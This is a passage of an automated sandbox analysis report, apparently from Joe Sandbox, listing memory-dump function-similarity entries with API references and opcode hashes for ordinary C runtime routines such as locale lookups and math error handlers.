                                                                                                                                                                                                  • Associated: 00000010.00000002.1552452581.00007FFEEE275000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552509174.00007FFEEE2AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552536826.00007FFEEE2B2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ffeee1c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: AddressProc
                                                                                                                                                                                                  • String ID: IsValidLocaleName$LocaleNameToLCID
                                                                                                                                                                                                  • API String ID: 190572456-1205873579
                                                                                                                                                                                                  • Opcode ID: da5a0cbb9eed6f49c66cde4c074b3381cfb5118fa4e19aac0d89585cb23fb15e
                                                                                                                                                                                                  • Instruction ID: a39fdc2e53014e9a0e7531813328783753332e534f04d6004ed480362b87b4c5
                                                                                                                                                                                                  • Opcode Fuzzy Hash: da5a0cbb9eed6f49c66cde4c074b3381cfb5118fa4e19aac0d89585cb23fb15e
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8831B161B09B4283FA549F19B41037522D0AF8C794F475135EE9D573B8EFACF940824A
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.1552353019.00007FFEEE1C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFEEE1C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552320581.00007FFEEE1C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552452581.00007FFEEE275000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552509174.00007FFEEE2AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552536826.00007FFEEE2B2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ffeee1c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: AddressLocaleProcValid
                                                                                                                                                                                                  • String ID: IsValidLocaleName
                                                                                                                                                                                                  • API String ID: 2003423906-4210551052
                                                                                                                                                                                                  • Opcode ID: aa0c9484b85fe4de99d01dd0ea85bc865ed249eb48ddc0d080c0ce807d6728e7
                                                                                                                                                                                                  • Instruction ID: e0734908964f1e7ad8f34adec59b5e00c9e709e22f0201f826f5a03b407065b5
                                                                                                                                                                                                  • Opcode Fuzzy Hash: aa0c9484b85fe4de99d01dd0ea85bc865ed249eb48ddc0d080c0ce807d6728e7
                                                                                                                                                                                                  • Instruction Fuzzy Hash: E521B520B0D60282FA598F65B81177523A1AF8DB90F075235DD9D577F8EFACF9808341
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.1551419790.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551387449.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551462787.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF710303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551594165.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CurrentDirectory
                                                                                                                                                                                                  • String ID: :
                                                                                                                                                                                                  • API String ID: 1611563598-336475711
                                                                                                                                                                                                  • Opcode ID: e37c33f8f2befd5fbd3c49cdc0b6d52123385b6fd944ea7372e41dd3f6ca63dc
                                                                                                                                                                                                  • Instruction ID: 949a81af9528a8a87a4adb6088fcd41ae1d341a57f5be54c0a7e0f5be43ec9de
                                                                                                                                                                                                  • Opcode Fuzzy Hash: e37c33f8f2befd5fbd3c49cdc0b6d52123385b6fd944ea7372e41dd3f6ca63dc
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0E21CE63B08A8182EF60BB15D4542BEABA2FB84B94FC54035DA8C53784CF7CFD498760
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-1-0(?,?,?,00007FFEEE1D00FD), ref: 00007FFEEE1E231B
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.1552353019.00007FFEEE1C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFEEE1C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552320581.00007FFEEE1C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552452581.00007FFEEE275000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552509174.00007FFEEE2AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552536826.00007FFEEE2B2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ffeee1c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: AddressProc
                                                                                                                                                                                                  • String ID: AppPolicyGetThreadInitializationType$CompareStringEx
                                                                                                                                                                                                  • API String ID: 190572456-1200376162
                                                                                                                                                                                                  • Opcode ID: 95f3ea5dba3dd10852bc24ad49b951e7ad07eba23ba389b1255418d767f352e6
                                                                                                                                                                                                  • Instruction ID: 919fa4e31052d3702f426e6d973c424fd81c4f83d9915c68c2c0145fe5445867
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 95f3ea5dba3dd10852bc24ad49b951e7ad07eba23ba389b1255418d767f352e6
                                                                                                                                                                                                  • Instruction Fuzzy Hash: E221C361A0960342FA558B98F821BB513919F8C394F1B5136ED9D4B3B8EEACF9818743
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.1552353019.00007FFEEE1C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFEEE1C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552320581.00007FFEEE1C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552452581.00007FFEEE275000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552509174.00007FFEEE2AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552536826.00007FFEEE2B2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ffeee1c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _handle_error
                                                                                                                                                                                                  • String ID: "$pow
                                                                                                                                                                                                  • API String ID: 1757819995-713443511
                                                                                                                                                                                                  • Opcode ID: 2042b7108def7f110b1b6ee9971e6cff704b54fec920353340c6430c5a27a184
                                                                                                                                                                                                  • Instruction ID: 33f8031779a8184149323986d85e77eaa6eca657dcd0346ff4fac79a67338ea7
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2042b7108def7f110b1b6ee9971e6cff704b54fec920353340c6430c5a27a184
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 58216E72D18AC486D774DF54F04076AB6A1FFEA344F122326F6C906964CBBDD0819B01
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.1551419790.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551387449.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551462787.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF710303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551594165.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                                  • String ID: csm
                                                                                                                                                                                                  • API String ID: 2573137834-1018135373
                                                                                                                                                                                                  • Opcode ID: 353d784395b77eefcba7ec404c7e4e47dbaba59ece92a9373595b893a828088a
                                                                                                                                                                                                  • Instruction ID: 7f73d800b3a425f4758f60ec51b0d0ff776963957c08862f785d087010eaf67f
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 353d784395b77eefcba7ec404c7e4e47dbaba59ece92a9373595b893a828088a
                                                                                                                                                                                                  • Instruction Fuzzy Hash: A3118B32618F8182EB618B24F50026ABBE0FB88B94F984230DF8C07769DF3CE455CB00
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.1551419790.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551387449.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551462787.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF710303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551594165.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: DriveType_invalid_parameter_noinfo
                                                                                                                                                                                                  • String ID: :
                                                                                                                                                                                                  • API String ID: 2595371189-336475711
                                                                                                                                                                                                  • Opcode ID: 229dc5225c97c31120184e1c5c073253f760aebc87e6502baf4f3d3b6f3e4c47
                                                                                                                                                                                                  • Instruction ID: b52549dab8f6fa18d36ee9f29823605c4451c89bd64dcef07c637251050dbbb5
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 229dc5225c97c31120184e1c5c073253f760aebc87e6502baf4f3d3b6f3e4c47
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3F01842291CA4386FB61BF60946167EAB90EF48728FC00135D54D46791DF7CF948CB28
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.1552353019.00007FFEEE1C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFEEE1C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552320581.00007FFEEE1C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552452581.00007FFEEE275000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552509174.00007FFEEE2AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552536826.00007FFEEE2B2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ffeee1c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _handle_errorf
                                                                                                                                                                                                  • String ID: "$expf
                                                                                                                                                                                                  • API String ID: 2315412904-303238936
                                                                                                                                                                                                  • Opcode ID: fef54ff7b95874bec43b0b3bdd19ececa4550de330a24f97a3394677f46fc204
                                                                                                                                                                                                  • Instruction ID: cdaea9ce57f06f71ea42027c04a19beaa651d7cfac4bc4170452011535dde23e
                                                                                                                                                                                                  • Opcode Fuzzy Hash: fef54ff7b95874bec43b0b3bdd19ececa4550de330a24f97a3394677f46fc204
                                                                                                                                                                                                  • Instruction Fuzzy Hash: D8017072928AC496E220CB21E08A3AAB6A0FFE5344F615315E784166B0CFBDD4D5EB40
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.1552353019.00007FFEEE1C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFEEE1C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552320581.00007FFEEE1C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552452581.00007FFEEE275000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552509174.00007FFEEE2AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552536826.00007FFEEE2B2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ffeee1c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _handle_error
                                                                                                                                                                                                  • String ID: "$exp
                                                                                                                                                                                                  • API String ID: 1757819995-2878093337
                                                                                                                                                                                                  • Opcode ID: c4fcf76e3e29136143e1cba3a9cff0f211c77a69fc1107ed387352c2ebce5c6a
                                                                                                                                                                                                  • Instruction ID: e3947faa3afa3a6941ced2dccf4ae525205e075ab209d12c9c47f50e7d428d9d
                                                                                                                                                                                                  • Opcode Fuzzy Hash: c4fcf76e3e29136143e1cba3a9cff0f211c77a69fc1107ed387352c2ebce5c6a
                                                                                                                                                                                                  • Instruction Fuzzy Hash: F501A176928A8882E220CF24E4493AA76A1FFEA304F611316E78516670CBBDD4C1DB00
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.1552353019.00007FFEEE1C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFEEE1C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552320581.00007FFEEE1C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552452581.00007FFEEE275000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552509174.00007FFEEE2AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552536826.00007FFEEE2B2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ffeee1c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _handle_errorf_raise_excf
                                                                                                                                                                                                  • String ID: !$sinf
                                                                                                                                                                                                  • API String ID: 3848079588-676365165
                                                                                                                                                                                                  • Opcode ID: 89606b5e8b4cf005ad09f5a2b269fb4f6582657320634e1412b4497a7eece82f
                                                                                                                                                                                                  • Instruction ID: b9ba85f7195396449ea627c5c8139b609290ce2efcf7259cf5fe46a1055ca5d9
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 89606b5e8b4cf005ad09f5a2b269fb4f6582657320634e1412b4497a7eece82f
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3901887291C68187F314DB66B48136AB691FFD4784F314325E789066B8DBBCD4C09F41
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.1552353019.00007FFEEE1C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFEEE1C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552320581.00007FFEEE1C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552452581.00007FFEEE275000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552509174.00007FFEEE2AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552536826.00007FFEEE2B2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ffeee1c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _handle_errorf_raise_excf
                                                                                                                                                                                                  • String ID: !$tanf
                                                                                                                                                                                                  • API String ID: 3848079588-3147098732
                                                                                                                                                                                                  • Opcode ID: dac575506c6d9ff4d36a2ef70b3c3940e4631d6360e2b511d47d035168ef6ee1
                                                                                                                                                                                                  • Instruction ID: 850443bf08def7a57aecc35f3cb15e57d243a63525240983d3a23c8e45c0177d
                                                                                                                                                                                                  • Opcode Fuzzy Hash: dac575506c6d9ff4d36a2ef70b3c3940e4631d6360e2b511d47d035168ef6ee1
                                                                                                                                                                                                  • Instruction Fuzzy Hash: DC01887291C68187F314DB66B48136AB591FFD4784F314325E78906AB9DBBCD4C09F41
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(?,?,?,?,00000000,00000000,?,?,00000000,00007FFEEE1CC9C1), ref: 00007FFEEE1CCBE6
                                                                                                                                                                                                  • MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(?,?,?,?,00000000,00000000,?,?,00000000,00007FFEEE1CC9C1), ref: 00007FFEEE1CCC39
                                                                                                                                                                                                  • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,00000000,00000000,?,?,00000000,00007FFEEE1CC9C1), ref: 00007FFEEE2109E1
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.1552353019.00007FFEEE1C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFEEE1C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552320581.00007FFEEE1C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552452581.00007FFEEE275000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552509174.00007FFEEE2AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552536826.00007FFEEE2B2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ffeee1c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1717984340-0
                                                                                                                                                                                                  • Opcode ID: d72928f14c07642b18a7873c648fbe44bf993ae18c83a1b561327d21b3e4d091
                                                                                                                                                                                                  • Instruction ID: 1385e4727a39e8280646246d1fd87104224fcb87b42d896c2b7a5fe93f38d460
                                                                                                                                                                                                  • Opcode Fuzzy Hash: d72928f14c07642b18a7873c648fbe44bf993ae18c83a1b561327d21b3e4d091
                                                                                                                                                                                                  • Instruction Fuzzy Hash: AEB1C921E0C26245F7685F54A05177D6690FF88794F6F4237DBDE86AF4CEACA9C08203